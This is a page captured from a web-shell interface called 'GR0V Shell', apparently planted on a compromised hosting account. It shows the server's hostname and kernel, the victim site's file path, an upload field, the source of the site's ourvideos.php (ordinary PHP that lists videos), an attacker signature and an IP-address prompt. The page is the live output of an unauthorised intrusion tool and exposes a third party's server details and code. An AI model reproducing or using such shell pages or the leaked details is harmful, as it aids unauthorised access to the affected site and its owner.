? GR0V Shell

GR0V shell

Linux node1.dnscloudserver.in 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64

Path : /home/enviro777/public_html/
File Upload :
Current File : /home/enviro777/public_html/ourvideos.php

<?php
$pagetitle ="Our Videos";
include ("includes/header.php");
 ?>
			<!--Contact-->
				<div class="content">
				<div class="contact">
			<div class="container">
				<div class="row">
					<div class="col-md-12">
						<h3>Our Videos</h3>		
					</div>
				</div>
				<div class="contact-grids">
				
                <?php include ("connection.php");
				 
		$query2=mysqli_query($link,"select * from videos where status='1'");
		while($row=mysqli_fetch_object($query2))
				{
		 		?>  		

                        
                      <iframe width="350" height="200" src="https://www.youtube.com/embed/<?=$row->videos?>" frameborder="0" allowfullscreen></iframe>
                  
                        			    <?php } ?>
										 <div class="clearfix"></div>
									</div>
								
							</div>
					</div>
			</div>
				<!--Contact-->
						<?php include ("includes/footer.php"); ?>

T1KUS90T
  root-grov@65.21.25.53:~$